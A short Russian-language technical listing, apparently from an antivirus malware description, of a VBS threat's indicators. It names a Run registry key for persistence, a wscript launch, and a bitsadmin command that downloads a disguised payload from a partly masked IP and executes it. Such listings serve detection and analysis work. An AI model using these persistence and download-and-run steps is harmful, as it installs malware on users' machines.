Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'Vatico.vbs' = '%APPDATA%\Vatico\Vatico.vbs'
- '<SYSTEM32>\wscript.exe' "%APPDATA%\Vatico\Vatico.vbs"
- '<SYSTEM32>\cmd.exe' /c bitsadmin /transfer /download "http://17#.#3.7.199/pi/st6.png" "%cd%\mnoko.vbs" && start mnoko.vbs
- %APPDATA%\Vatico\Vatico.vbs